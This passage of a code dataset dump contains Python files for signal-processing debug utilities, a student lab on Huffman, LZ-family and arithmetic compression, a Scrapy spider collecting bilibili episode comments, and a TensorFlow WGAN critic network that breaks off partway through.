np.abs(yf2[:number_samples2//2]))))\n\n plt.title('Frequency response')\n plt.xlabel('Frequency [radians / second]')\n plt.ylabel('Amplitude [dB]')\n if data2 is not None:\n plt.legend(['data1', 'data2'], fontsize=10)\n else:\n plt.legend(['data'], fontsize=10)\n # plt.margins(0, 0.1)\n plt.grid(which='both', axis='both')\n printDebug(freq_ref)\n plt.axvline(freq_ref, color='green') # cutoff frequency\n plt.show()\n\ndef interpolateData(time, signal, number_of_points, kind = 'linear'):\n \"\"\"Inrerpolate data to be in conformity with time vector.\"\"\"\n \n kind = Global.interpolation_type\n tx_interp = interpolate.interp1d(time, signal, kind=kind, fill_value=\"extrapolate\")\n\n base_time_vector = np.arange(0, number_of_points)*Global.time_step\n\n # printDebug(tx_interp(Global.base_time_vector))\n # plotDebug(tx_interp(Global.base_time_vector), Global.base_time_vector, symbols='b-')\n return tx_interp(base_time_vector)\n \n\ndef plotDebug(signal, time = None, label = \"\", symbols='r-', hold = False, title = None):\n \"\"\"Fast plot for debug.\"\"\"\n\n if label == \"\":\n # Get function call\n function_call = inspect.stack()[1][-2][0].strip()\n # Extract function name\n func_name = function_call.split('(')[0]\n # Extract \n label = function_call.split(func_name)[1].split(',')[0]\n if label[0] == '(':\n label = label[1:]\n if label[-1] == ')':\n label = label[:-1]\n # replace('(','').replace(')','').split(',')[0]\n \n if time is None:\n plt.plot(signal, symbols, label=label)\n else:\n plt.plot(time, signal, symbols, label=label)\n plt.grid(True)\n # plt.ylim(np.min(signal)*1.1, np.max(signal)*1.1)\n plt.legend(fontsize=10)\n if title is not None:\n plt.title(title)\n if not hold:\n plt.show()\n\ndef printDebug(signal = None, details = False, plot = False, stop = False, stop_message = \"\"):\n \"\"\"Pretty debug signal print. Use details = True for more information on the object. Use stop = True to stop program after print.\"\"\"\n\n print('\\n---------------------------------------------------------------------------')\n\n if signal is None and stop:\n raise ValueError(f\"\\n\\n***User called printDebug() to stop execution!\\n\")\n \n if signal is None:\n raise ValueError(f\"\\n\\n***'None' signal passed to printDebug()!\\n\")\n \n # Get function call\n function_call = inspect.stack()[1][-2][0].strip()\n # Extract function name\n func_name = function_call.split('(')[0]\n # Extract \n signal_name = function_call.split(func_name)[1].split(',')[0]\n if signal_name[0] == '(':\n signal_name = signal_name[1:]\n if signal_name[-1] == ')':\n signal_name = signal_name[:-1]\n # replace('(','').replace(')','').split(',')[0]\n \n print('> START <' + f\"\\t-->\\t<{signal_name}>\")\n # Actual print with value\n print(f\"{type(signal)}\")\n try:\n print(f\"length = {len(signal)}\")\n except:\n pass\n print(f\"Value :\\n{signal}\")\n \n if details:\n print('\\n>>> More details <<<\\n')\n print(f\">> All methods for {type(signal)}:\")\n print(f\"{dir(signal)}\")\n \n if plot:\n plotDebug(signal, label = signal_name)\n\n print(f\"{type(signal)}\")\n try:\n print(f\"length = {len(signal)}\")\n except:\n pass\n print('> END <' + f\"\\t-->\\t<{signal_name}>\")\n print('---------------------------------------------------------------------------\\n')\n\n if stop or stop_message != \"\":\n if stop_message != \"\":\n raise ValueError(f\"\\n\\n***User called printDebug() to stop execution!\\n\")\n else:\n raise ValueError(stop_message)\n\ndef adjustRange(signal, new_max, new_min, old_max, old_min, offset):\n \"\"\"Adjust signal to some new range.\"\"\"\n \n return (new_max - (new_min))/(old_max - old_min)\\\n *(signal - old_min) + (new_min) + (offset)\n # return (new_max - (new_min + offset))/(old_max - old_min)\\\n # *(signal - old_min) + (new_min + offset)\n\ndef zeroClip(signal):\n \"\"\"Returns the same signal, but clipped to zero\"\"\"\n \n return np.array([item if item >= 0 else 0 for item in signal])\n\ndef plotTxRxData(data, time, label, handle, sync_obj, show = False):\n \"\"\"Plots Tx/Rx data.\"\"\"\n \n sync_obj.appendToSimulationPath(\"plotTxRxData @ generalLibrary\")\n \n # Set previous for debug\n sync_obj.setPrevious(\"generalLibrary\")\n \n # plt.figure(figsize=(8,2))\n plt.plot(time, data, label=label)\n # plt.plot(time, data, 'bo-', label=label)\n # plt.plot((np.fft.ifft(data)), label=label)\n plt.legend(fontsize=10)\n plt.xlabel('Time'); plt.ylabel('$|x(t)|$')\n plt.grid(True)\n plt.show(show)\n\ndef removeOutliers(signal, sigma_threshold = 6, default_outlier = 0):\n \"\"\"Get signal, find outliers, and remove\"\"\"\n\n # get std\n signal_std = np.std(signal)\n\n # find outliers\n outliers = abs(signal) > sigma_threshold*signal_std\n\n printDebug(outliers)\n\n # remove the outliers, settinf to default value\n signal[outliers] = default_outlier\n\n # get outlier positions\n outlier_positions = [index for index, out in enumerate(outliers) if out]\n \n\n return signal, outlier_positions\n\ndef sumVectosDiffSizes(a, b):\n \"\"\"Sum vectors with different sizes: c = a + b.\"\"\"\n\n if len(a) < len(b):\n c = b.copy()\n c[:len(a)] = c[:len(a)] + a\n else:\n c = a.copy()\n c[:len(b)] = c[:len(b)] + b\n \n return c\n\ndef mulVectosDiffSizes(a, b, shift = 0):\n \"\"\"Multiply vectors with different sizes: c = a * b. Shift smaller by shift positions.\"\"\"\n\n if len(a) < len(b):\n a = np.roll(sumVectosDiffSizes(b.copy()*0, a), shift)\n c = a*b\n else:\n b = np.roll(sumVectosDiffSizes(a.copy()*0, b), shift)\n c = a*b\n \n return c\n\n\n# def plotTxRxDataList(data_list, time_list, label, handle, sync_obj, show = False):\ndef plotTxRxDataList(data_list, label, handle, sync_obj, show = False):\n \"\"\"Plots Tx/Rx data list.\"\"\"\n \n sync_obj.appendToSimulationPath(\"plotTxRxDataList @ generalLibrary\")\n \n # Set previous for debug\n sync_obj.setPrevious(\"generalLibrary\")\n \n shift = 0\n # concatenated_data = []\n # concatenated_data = 0\n # final_data = np.zeros((1+len(data_list))*Global.number_of_points)\n # final_data = np.zeros((1+len(data_list))*Global.number_of_points)\n all_zeros = np.zeros((1+len(data_list))*Global.number_of_points)\n final_data = all_zeros.copy()\n for data in data_list:\n # new_data = data\n # starts vector with all zeros plus actual data\n new_data = sumVectosDiffSizes(all_zeros.copy(), data)\n if shift >= 0:\n shift += 1\n new_data = np.roll(new_data, (shift-1)*Global.number_of_points)\n # elif shift > 1:\n # # new_data = np.roll(data, Global.number_of_points)\n # # shifts data to \n # shift += 1\n # # new_data = np.roll(new_data, 100)\n # pass\n \n # new_data = sumVectosDiffSizes(all_zeros.copy(), new_data)\n\n final_data = sumVectosDiffSizes(final_data, new_data)\n\n # concatenated_data += list(new_data)\n # # concatenated_data = concatenated_data + new_data\n printDebug(Global.number_of_points)\n # printDebug(Global.number_of_points*2)\n # # printDebug(new_data)\n # # plotDebug(new_data)\n # plotDebug(final_data)\n\n # interpolateData\n # plotDebug(concatenated_data)\n \n # concatenated_time = []\n # for idx,data in enumerate(data_list):\n # concatenated_time += list(Global.base_time_vector + idx*Global.time_frame)\n \n # concatenated_data = np.array(final_data)\n # concatenated_time = np.array(concatenated_time)\n\n concatenated_time = np.arange(0, len(final_data))*Global.time_step\n # plotDebug(final_data, concatenated_time)\n \n # plot concatenated list\n plotTxRxData(\n data = final_data,\n time = concatenated_time,\n label = label,\n handle = handle,\n sync_obj = sync_obj,\n show = show\n )\n \ndef timer_dec(function):\n \"\"\"Function to be used as decorator, for method timing calculations.\"\"\"\n def timed_function(self, *args, **kw):\n start_time = timer()\n result = function(self, *args, **kw)\n elapsed = timer() - start_time\n print(f'>>>> Function \"{function.__name__} (@ {self.__class__.__name__})\" took {elapsed} seconds to complete.\\n')\n \n return result\n return timed_function\n\ndef sync_track(function):\n \"\"\"Function to be used as decorator, for SimulationSync object simulation path tracking.\"\"\"\n def synced_function(self, *args, **kw):\n \n # curframe = inspect.currentframe()\n # calframe = inspect.getouterframes(curframe, 2)\n # # print('curframe:', curframe)\n # print('caller name:', calframe[1][3])\n \n # Get sync object\n sync_obj = self.__class__.getSyncObj(self)\n \n # If NO debug i set\n if not sync_obj.DEBUG[\"all\"] and not sync_obj.DEBUG[\"SimulationSync\"]:\n \n # apply function, and get result (with no DEBUG)\n result = function(self, *args, **kw)\n return result\n \n \n frame = inspect.stack()[1]\n module = inspect.getmodule(frame[0])\n # filename = module.__file__\n module_name = module.__name__\n \n \n # Set previous for debug\n sync_obj.setPrevious(f\"{module_name}\")\n # sync_obj.setPrevious(f\"{self.__class__.__name__}\")\n \n # SUPPORTS ONLY TWO NESTED DECORATORS!\n # Check if function name is one of the inner functions for decorators\n if function.__name__ in [\"timed_function\"]:\n # print()\n # print(function.__name__)\n # # print(frame.function)\n # print(frame.code_context)\n # print(frame.code_context[0].strip().replace(\"\\n\",\"\").split('.')[-1])\n \n # Add function, called from within a decorator\n function_from_decorator = frame.code_context[0].strip().replace(\"\\n\",\"\").split(\".\")[-1]\n sync_obj.appendToSimulationPath(f'{self.__class__.__name__}.{function_from_decorator} -- @{function.__name__}')\n \n else:\n # Add function, called from given class\n sync_obj.appendToSimulationPath(f\"{self.__class__.__name__}.{function.__name__}()\")\n \n \n # Set sync object\n self.__class__.setSyncObj(self, sync_obj)\n \n # # Print whole simul path\n # print(sync_obj.getSimulationPath())\n \n # apply function, and get result\n result = function(self, *args, **kw)\n \n return result\n \n return synced_function\n\n\n# def for_all_methods(decorator):\n# def decorate(my_class):\n# for attribute in my_class.__dict__:\n# if attribute not in ['getSyncObj', 'setSyncObj', '__init__'] and callable(getattr(my_class, attribute)):\n# print(attribute)\n# # print(f\"{[my_class, attribute, decorator(getattr(my_class, attribute))]}\")\n# setattr(my_class, f\"self.{attribute}\", decorator(getattr(my_class, attribute)))\n# return my_class\n# return decorate\n\n# # Got from \"https://www.idtools.com.au/gpu-accelerated-fft-compatible-numpy/\"\n# def ifft2_gpu(y, fftshift=False):\n# ''' This function produce an output that is \n# compatible with numpy.fft.ifft2\n# The input y is a 2D complex numpy array'''\n \n# # Get the shape of the initial numpy array\n# n1, n2 = y.shape\n \n# # From numpy array to GPUarray. Take only the first n2/2+1 non redundant FFT coefficients\n# if fftshift is False:\n# y2 = np.asarray(y[:,0:n2//2 + 1], np.complex64)\n# else:\n# y2 = np.asarray(np.fft.ifftshift(y)[:,:n2//2+1], np.complex64)\n# ygpu = gpuarray.to_gpu(y2)\n \n# # Initialise empty output GPUarray \n# x = gpuarray.empty((n1,n2), np.float32)\n \n# # Inverse FFT\n# plan_backward = cu_fft.Plan((n1, n2), np.complex64, np.float32)\n# cu_fft.ifft(ygpu, x, plan_backward)\n \n# # Must divide by the total number of pixels in the image to get the normalisation right\n# xout = x.get()/n1/n2\n \n# return xout\n\n","sub_path":"VLC_devel/build/lib/vlcPhy/generalLibrary.py","file_name":"generalLibrary.py","file_ext":"py","file_size_in_byte":18995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"622943185","text":"from math import *\r\n\r\n\r\nclass HaffmanNode:\r\n def __init__(self, isLeaf, frequency, zeroNode = None, oneNode = None, let = None):\r\n self.IsLeaf = isLeaf\r\n self.Frequency = frequency\r\n self.ZeroNode = zeroNode\r\n self.OneNode = oneNode\r\n self.Letter = let\r\n\r\n\r\nclass LZ77Node:\r\n def __init__(self, offset, length, next):\r\n self.Offset = offset\r\n self.Length = length\r\n self.Next = next\r\n\r\n def __str__(self):\r\n return '<' + str(self.Offset) + ',' + str(self.Length) + ',' + str(self.Next) + '>'\r\n\r\n def __repr__(self):\r\n return self.__str__()\r\n\r\n def str__lzss(self):\r\n if self.Next != '$':\r\n return '<0,' + str(self.Next) + '>'\r\n else:\r\n return '<' + str(self.Offset) + ',' + str(self.Length) + '>'\r\n\r\n\r\nclass LZ78Node:\r\n def __init__(self, pos, next):\r\n self.Pos = pos\r\n self.Next = next\r\n\r\n def __str__(self):\r\n return '<' + str(self.Pos) + ',' + str(self.Next) + '>'\r\n\r\n def __repr__(self):\r\n return self.__str__()\r\n\r\n\r\ns1 = 'ХАААХВХХХА'\r\ns2 = 'BBACDAABCA'\r\ns3 = 'ЛИМОНАД ЛИМОННЫЙ'\r\ndictsize = 8\r\nbuffersize = 6\r\nfrequences = []\r\nstep = 1.0 / len(s1)\r\n\r\n\r\ndef get_frequency(s: str):\r\n answer = {}\r\n step = 1.0 / len(s)\r\n for i in s:\r\n if i in answer:\r\n answer[i] += step\r\n else:\r\n answer[i] = step\r\n return answer\r\n\r\n\r\ndef get_ariphmetic_foundation(s: str):\r\n fr = get_frequency(s)\r\n prev = 0.0\r\n lst = []\r\n for i in fr:\r\n freq = fr[i]\r\n lst.append((prev, prev + freq, i))\r\n prev += freq\r\n\r\n return lst\r\n\r\n\r\nfor letter in s1:\r\n f = False\r\n for it in range(len(frequences)):\r\n if frequences[it][0] == letter:\r\n frequences[it][1] += step\r\n f = True\r\n break\r\n if not f:\r\n frequences.append([letter, step])\r\n\r\nfrequencesblock = []\r\nstepblock = 2.0 / (len(s1))\r\n\r\nfor i in range(1, len(s1), 2):\r\n key = s1[i - 1] + s1[i]\r\n f = False\r\n for it in range(len(frequencesblock)):\r\n if frequencesblock[it][0] == key:\r\n frequencesblock[it][1] += stepblock\r\n f = True\r\n break\r\n if not f:\r\n frequencesblock.append([key, step])\r\n\r\ndef get_entropy(dict1):\r\n answer = 0.0\r\n for it in dict1:\r\n answer -= it[1] * log2(it[1])\r\n return answer\r\n\r\n\r\ndef get_average_elementary(dict1):\r\n answer = 0.0\r\n divisor = 0\r\n for it in dict1:\r\n answer += len(dict1[it])\r\n divisor += len(it)\r\n answer /= divisor\r\n return answer\r\n\r\n\r\ndef get_haffman_tree(lst):\r\n answer = []\r\n for it in lst:\r\n answer.append(HaffmanNode(True, it[1], let=it[0]))\r\n while len(answer) > 1:\r\n sorted(answer, key=lambda node: node.Frequency)\r\n answer.append(HaffmanNode(False, answer[0].Frequency + answer[1].Frequency, zeroNode=answer[0], oneNode=answer[1]))\r\n answer.remove(answer[1])\r\n answer.remove(answer[0])\r\n return answer[0]\r\n\r\n\r\ndef DFS(v, prefix, keys):\r\n if v.IsLeaf:\r\n keys[v.Letter] = prefix\r\n return\r\n DFS(v.OneNode, prefix + '0', keys)\r\n DFS(v.ZeroNode, prefix + '1', keys)\r\n\r\n\r\ndef get_haffman_code(lst):\r\n root = get_haffman_tree(lst)\r\n keys = {}\r\n DFS(root, \"\", keys)\r\n return keys\r\n\r\n\r\nhc = get_haffman_code(frequences)\r\nhcb = get_haffman_code(frequencesblock)\r\nprint(hc)\r\nprint(hcb)\r\nprint(\"Энтропия : \" + str(round(get_entropy(frequences), 4)))\r\nprint(\"Среднее количество элементарных символов метод Хаффмана : \" + str(round(get_average_elementary(hc), 4)))\r\nprint(\"Среднее количество элементарных символов блочный метод Хаффмана : \" + str(round(get_average_elementary(hcb), 4)))\r\n\r\n\r\ndef get_haffman_adapt_code(s):\r\n answer = {}\r\n for i in s:\r\n if not answer.__contains__(i):\r\n answer[i] = 0\r\n answer[i] += 1\r\n lst = []\r\n for i in answer:\r\n lst.append((answer[i], i))\r\n sorted(lst, key=lambda x: x[0])\r\n haffman_code = {}\r\n prefix = ''\r\n for i in lst:\r\n haffman_code[i[1]] = prefix + '0'\r\n prefix += '1'\r\n return haffman_code\r\n\r\n\r\nhac = get_haffman_adapt_code(s2)\r\nprint(\"Адаптивный код Хаффмана:\")\r\nprint(hac)\r\nprint(\"Среднее количество элементарных символов адаптивный метод Хаффмана : \" + str(round(get_average_elementary(hac), 4)))\r\n\r\nprint(\"Адаптивный хаффман декодирование : мсиммпа\")\r\n\r\n\r\ndef encode_lz77(s):\r\n window = \"\"\r\n n = 0\r\n answer = []\r\n windowsize = 8\r\n\r\n while n < len(s):\r\n maxl = 0\r\n crt = (n, 0)\r\n for i in range(len(window)):\r\n for j in range(min(len(s) - 1 - n, len(window))):\r\n if window[i:i + j + 1] == s[n:n + j + 1] and j + 1 > maxl:\r\n maxl = j + 1\r\n crt = (i, j)\r\n answer.append(LZ77Node(n - crt[0], maxl, s[n + crt[1]]))\r\n n += crt[1] + 1\r\n window = s[max(0, n - windowsize):n]\r\n return answer\r\n\r\n\r\ndef decode_lz77(encoded):\r\n answer = ''\r\n for node in encoded:\r\n if node.Length > 0:\r\n start = len(answer) - node.Offset - 1\r\n answer += answer[start:start + node.Length]\r\n answer += node.Next\r\n return answer\r\n\r\n\r\nlz77pr = [\r\n LZ77Node(0, 0, 'м'),\r\n LZ77Node(0, 0, 'я'),\r\n LZ77Node(0, 0, 'т'),\r\n LZ77Node(0, 0, 'а'),\r\n LZ77Node(0, 0, ' '),\r\n LZ77Node(4, 3, 'ы'),\r\n LZ77Node(0, 0, 'й'),\r\n LZ77Node(5, 3, 'с'),\r\n LZ77Node(0, 0, 'о'),\r\n LZ77Node(4, 2, 'у'),\r\n LZ77Node(0, 0, 'к'),\r\n LZ77Node(0, 0, 'а')]\r\n\r\n\r\ntmp = encode_lz77(s3)\r\nprint(\"LZ77 кодирование\" + str(tmp))\r\nprint(\"LZ77 декодирование: \" + decode_lz77(lz77pr))\r\n\r\n\r\ndef LZ78Decode(encoded):\r\n ans = ''\r\n dict1 = [\"\"]\r\n for node in encoded:\r\n word = dict1[node.Pos] + node.Next\r\n ans += word\r\n dict1.append(word)\r\n return ans\r\n\r\n\r\ndef LZ78Encode(s):\r\n buffer = \"\"\r\n dictionary = {'': 0}\r\n ans = []\r\n for i in range(len(s) - 1):\r\n if buffer + s[i] in dictionary:\r\n buffer += s[i]\r\n else:\r\n ans.append(LZ78Node(dictionary[buffer], s[i]))\r\n dictionary[buffer + s[i]] = len(dictionary)\r\n buffer = \"\"\r\n\r\n i += 1\r\n ans.append(LZ78Node(dictionary[buffer], s[i]))\r\n return ans\r\n\r\n\r\ntmp = LZ78Encode(s3)\r\nprint(\"LZ78 кодирование \" + str(LZ78Encode(s3)))\r\nprint(\"LZ78 декодирование \" + str(LZ78Decode(tmp)))\r\n\r\n\r\ndef encode_lzss(s):\r\n window = \"\"\r\n n = 0\r\n answer = []\r\n windowsize = 8\r\n\r\n while n < len(s):\r\n maxl = 0\r\n crt = (n, 0)\r\n for i in range(len(window)):\r\n for j in range(min(len(s) - 1 - n, len(window))):\r\n if window[i:i + j + 1] == s[n:n + j + 1] and j + 1 >= maxl:\r\n maxl = j + 1\r\n crt = (i, j)\r\n if crt != (n, 0):\r\n answer.append(LZ77Node(len(window) - crt[0], maxl, '$'))\r\n else:\r\n answer.append(LZ77Node(0, 0, s[n]))\r\n n += crt[1] + 1\r\n window = s[max(0, n - windowsize):n]\r\n return answer\r\n\r\n\r\ndef decode_lzss(encoded):\r\n answer = ''\r\n for node in encoded:\r\n if node.Next == '$':\r\n start = len(answer) - node.Offset\r\n answer += answer[start:start + node.Length]\r\n else:\r\n answer += node.Next\r\n return answer\r\n\r\n\r\ntmp = encode_lzss(s3)\r\nt1 = []\r\nfor i in range(len(tmp)):\r\n t1.append(tmp[i].str__lzss())\r\nprint('LZSS кодирование ' + str(list(t1)))\r\nprint('LZSS декодирование ' + str(decode_lzss(tmp)))\r\nlzsspr = [\r\n LZ77Node(0, 0, 'м'),\r\n LZ77Node(0, 0, 'a'),\r\n LZ77Node(0, 0, 'ш'),\r\n LZ77Node(0, 0, 'и'),\r\n LZ77Node(0, 0, 'н'),\r\n LZ77Node(4, 1, '$'),\r\n LZ77Node(0, 0, ' '),\r\n LZ77Node(5, 5, '$'),\r\n LZ77Node(0, 0, 'к'),\r\n LZ77Node(0, 0, 'у'),\r\n LZ77Node(0, 0, 'в'),\r\n LZ77Node(8, 3, '$')\r\n]\r\nprint('LZSS декодирование ' + str(decode_lzss(lzsspr)))\r\n\r\n\r\nfrequences = get_frequency(s2)\r\n\r\n\r\ndef ariphmetic_coding(s: str):\r\n keys = get_ariphmetic_foundation(s)\r\n\r\n answer = 0.0\r\n step = 1.0\r\n\r\n for i in s:\r\n for j in keys:\r\n if j[2] == i:\r\n answer += step * j[0]\r\n step *= (j[1] - j[0])\r\n break\r\n return answer + step / 2\r\n\r\n\r\ndef ariphmetic_decoding(keys, length, count):\r\n answer = \"\"\r\n ans = 0.0\r\n step = 1.0\r\n for i in range(length):\r\n for j in keys:\r\n if ans + j[0] * step < count < ans + j[1] * step:\r\n answer += j[2]\r\n ans += step * j[0]\r\n step *= (j[1] - j[0])\r\n break\r\n return answer\r\n\r\n\r\ntmp = ariphmetic_coding(s2)\r\nprint(s2)\r\nprint(\"Арифметическое кодирование \" + str(tmp))\r\nprint(\"Расшифровка \" + ariphmetic_decoding(get_ariphmetic_foundation(s2), len(s2), tmp))\r\n","sub_path":"ТИ/Lab3.py","file_name":"Lab3.py","file_ext":"py","file_size_in_byte":9223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"109120897","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport re,logging\nfrom bilibili.items import BilibiliItem\n\nheaders = {'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\",\n 'Referer':'https://bilibili.com'}\n\nclass BilibilisSpider(scrapy.Spider):\n name = \"bilibilis\"\n allowed_domains = [\"bilibili.com\"]\n start_urls = (\n 'http://www.bilibili.com/',\n )\n\n def start_requests(self):\n url = 'http://bangumi.bilibili.com/api/timeline_v2'\n yield scrapy.Request(url,headers=headers,callback=self.a_parse)\n\n def a_parse(self,response):\n session_id_list = re.findall(r'\"season_id\":(.*?),\"season_status\"', response.text)\n title_list = re.findall(r'\"title\":\"(.*?)\",\"url\"',response.text)\n for session_id,title in zip(session_id_list, title_list):\n b_url = 'http://bangumi.bilibili.com/anime/'+ session_id\n yield scrapy.Request(b_url,headers=headers,callback=self.b_parse, meta={\"title\":title})\n\n def b_parse(self,response):\n episode_id_list = re.findall(r'data-episode-id=\"(.*?)\"',response.text)\n title= response.meta[\"title\"]\n tit_episode_list = re.findall(r'',response.text)\n for episode_id, tit_episode in zip(episode_id_list, tit_episode_list):\n c_url = 'http://bangumi.bilibili.com/web_api/get_source'\n yield scrapy.FormRequest(c_url,headers=headers,formdata={'episode_id':episode_id},callback=self.c_parse,meta={\"title\":title,\"tit_episode\":tit_episode})\n\n def c_parse(self, response):\n title = response.meta[\"title\"]\n tit_episode = response.meta[\"tit_episode\"]\n cid =re.findall(r'\"cid\":(.*?),',response.text)[0]\n d_url = 'http://comment.bilibili.com/{}.xml?html5=1'.format(cid)\n yield scrapy.Request(d_url,headers=headers,callback=self.d_parse,meta={\"title\":title,\"tit_episode\":tit_episode})\n\n def d_parse(self,response):\n item = BilibiliItem()\n comment_list = re.findall('(.*?)',response.text)\n for comment in comment_list:\n item['title']=response.meta['title']\n item['comment'] = comment\n item['tit_episode'] = response.meta['tit_episode']\n yield item\n\n\n\n","sub_path":"bilibili/bilibili/spiders/bilibilis.py","file_name":"bilibilis.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"153907218","text":"\"\"\" Model of Critic Network\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport time\nimport shutil\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.contrib import rnn\nfrom tensorflow.contrib import layers\nfrom utils import DataFactory\nimport Libs as libs\n\n\nclass C_MODEL(object):\n \"\"\" Model of Critic Network\n \"\"\"\n\n def __init__(self, config, graph, if_training=True):\n \"\"\" Build up the graph\n Inputs\n ------\n config :\n * batch_size : mini batch size\n * log_dir : path to save training summary\n * learning_rate : adam's learning rate\n * seq_length : length of sequence during training\n * penalty_lambda = gradient penalty's weight, ref from paper 'improved-wgan'\n * n_resblock : number of resblock in network body\n * if_handcraft_features : if_handcraft_features\n * residual_alpha : residual block = F(x) * residual_alpha + x\n * leaky_relu_alpha : tf.maximum(x, leaky_relu_alpha * x)\n * openshot_penalty_lambda : Critic = Critic - openshot_penalty_lambda * open_shot_score\n * if_use_mismatched : if True, negative scores = mean of (fake_scores + mismatched_scores)\n * n_filters : number of filters in all ConV\n graph :\n tensorflow default graph\n \"\"\"\n self.data_factory = DataFactory()\n # hyper-parameters\n self.batch_size = config.batch_size\n self.log_dir = config.log_dir\n self.learning_rate = config.learning_rate\n self.seq_length = config.seq_length\n self.penalty_lambda = config.penalty_lambda\n self.n_resblock = config.n_resblock\n self.if_handcraft_features = config.if_handcraft_features\n self.residual_alpha = config.residual_alpha\n self.leaky_relu_alpha = config.leaky_relu_alpha\n self.openshot_penalty_lambda = config.openshot_penalty_lambda\n self.if_use_mismatched = config.if_use_mismatched\n self.n_filters = config.n_filters\n self.if_training = if_training\n\n # steps\n self.__global_steps = tf.train.get_or_create_global_step(graph=graph)\n with tf.name_scope('Critic'):\n self.__steps = tf.get_variable('C_steps', shape=[\n ], dtype=tf.int32, initializer=tf.zeros_initializer(dtype=tf.int32), trainable=False)\n # data\n self.__G_samples = tf.placeholder(dtype=tf.float32, shape=[\n None, None, 10], name='G_samples')\n self.__real_data = tf.placeholder(dtype=tf.float32, shape=[\n None, None, 10], name='real_data')\n self.__matched_cond = tf.placeholder(dtype=tf.float32, shape=[\n None, None, 13], name='matched_cond')\n self.__mismatched_cond = tf.random_shuffle(self.__matched_cond)\n # adversarial learning : wgan\n self.__build_model()\n\n # summary\n if self.if_training:\n self.__summary_op = tf.summary.merge(tf.get_collection('C'))\n self.__summary_histogram_op = tf.summary.merge(\n tf.get_collection('C_histogram'))\n self.__summary_valid_op = tf.summary.merge(\n tf.get_collection('C_valid'))\n self.summary_writer = tf.summary.FileWriter(\n self.log_dir + 'C')\n self.valid_summary_writer = tf.summary.FileWriter(\n self.log_dir + 'C_valid')\n else:\n self.baseline_summary_writer = tf.summary.FileWriter(\n self.log_dir + 'Baseline_C')\n\n def __build_model(self):\n self.real_scores = self.inference(\n self.__real_data, self.__matched_cond)\n self.fake_scores = self.inference(\n self.__G_samples, self.__matched_cond, reuse=True)\n if self.if_use_mismatched:\n mismatched_scores = self.inference(\n self.__real_data, self.__mismatched_cond, reuse=True)\n neg_scores = (self.fake_scores + mismatched_scores) / 2.0\n else:\n neg_scores = self.fake_scores\n\n if self.if_training:\n # loss function\n self.__loss = self.__loss_fn(\n self.__real_data, self.__G_samples, neg_scores, self.real_scores, self.penalty_lambda)\n theta = libs.get_var_list('C')\n with tf.name_scope('optimizer') as scope:\n # Critic train one iteration, step++\n assign_add_ = tf.assign_add(self.__steps, 1)\n with tf.control_dependencies([assign_add_]):\n optimizer = tf.train.AdamOptimizer(\n learning_rate=self.learning_rate, beta1=0.5, beta2=0.9)\n grads = tf.gradients(self.__loss, theta)\n grads = list(zip(grads, theta))\n self.__train_op = optimizer.apply_gradients(\n grads_and_vars=grads, global_step=self.__global_steps)\n # histogram logging\n for grad, var in grads:\n tf.summary.histogram(\n var.name + '_gradient', grad, collections=['C_histogram'])\n else:\n f_fake = tf.reduce_mean(self.fake_scores)\n f_real = tf.reduce_mean(self.real_scores)\n with tf.name_scope('C_loss') as scope:\n self.EM_dist = f_real - f_fake\n self.summary_em = tf.summary.scalar(\n 'Earth Moving Distance', self.EM_dist)\n\n def inference(self, inputs, conds, reuse=False):\n \"\"\"\n Inputs\n ------\n inputs : tensor, float, shape=[batch_size, seq_length=100, features=10]\n real(from data) or fake(from G)\n conds : tensor, float, shape=[batch_size, swq_length=100, features=13]\n conditions, ball and team A\n reuse : bool, optional, defalt value is False\n if share variable\n\n Return\n ------\n score : float\n real(from data) or fake(from G)\n \"\"\"\n with tf.variable_scope('C_inference', reuse=reuse):\n concat_ = tf.concat([conds, inputs], axis=-1)\n if self.if_handcraft_features:\n concat_ = self.data_factory.extract_features(concat_)\n with tf.variable_scope('conv_input') as scope:\n conv_input = tf.layers.conv1d(\n inputs=concat_,\n filters=self.n_filters,\n kernel_size=5,\n strides=1,\n padding='same',\n activation=libs.leaky_relu,\n kernel_initializer=layers.xavier_initializer(),\n bias_initializer=tf.zeros_initializer()\n )\n # residual block\n next_input = conv_input\n for i in range(self.n_resblock):\n res_block = libs.residual_block(\n 'Res' + str(i), next_input, n_filters=self.n_filters, n_layers=2, residual_alpha=self.residual_alpha, leaky_relu_alpha=self.leaky_relu_alpha)\n next_input = res_block\n with tf.variable_scope('conv_output') as scope:\n normed = layers.layer_norm(next_input)\n nonlinear = libs.leaky_relu(normed)\n conv_output = tf.layers.conv1d(\n inputs=nonlinear,\n filters=1,\n kernel_size=5,\n strides=1,\n padding='same',\n activation=libs.leaky_relu,\n kernel_initializer=layers.xavier_initializer(),\n bias_initializer=tf.zeros_initializer()\n )\n conv_output = tf.reduce_mean(conv_output, axis=1)\n final_ = tf.reshape(\n conv_output, shape=[-1])\n return final_\n\n def loss_for_G(self, reals, fakes, conds, latent_weight_penalty):\n \"\"\" \n Param\n -----\n reals : \n fakes : \n conds : \n latent_weight_penalty : \n \"\"\"\n openshot_penalty_lambda = tf.constant(\n self.openshot_penalty_lambda)\n openshot_penalty = self.__open_shot_penalty(\n reals, conds, fakes, if_log=True)\n fake_scores = self.inference(fakes, conds, reuse=True)\n scale_ = tf.abs(tf.reduce_mean(fake_scores))\n loss = - tf.reduce_mean(fake_scores) + scale_ * \\\n openshot_penalty_lambda * openshot_penalty + scale_ * latent_weight_penalty\n return loss\n\n def __open_shot_penalty(self, reals, conds, fakes, if_log):\n \"\"\"\n \"\"\"\n real_os_penalty = self.__open_shot_score(\n reals, conds, if_log=if_log, log_scope_name='real')\n fake_os_penalty = self.__open_shot_score(\n fakes, conds, if_log=if_log, log_scope_name='fake')\n return tf.abs(real_os_penalty - fake_os_penalty)\n\n def __open_shot_score(self, inputs, conds, if_log, log_scope_name=''):\n \"\"\"\n log_scope_name : string\n scope name for open_shot_score\n \"\"\"\n with tf.name_scope('open_shot_score') as scope:\n # calculate the open shot penalty on each frames\n ball_pos = 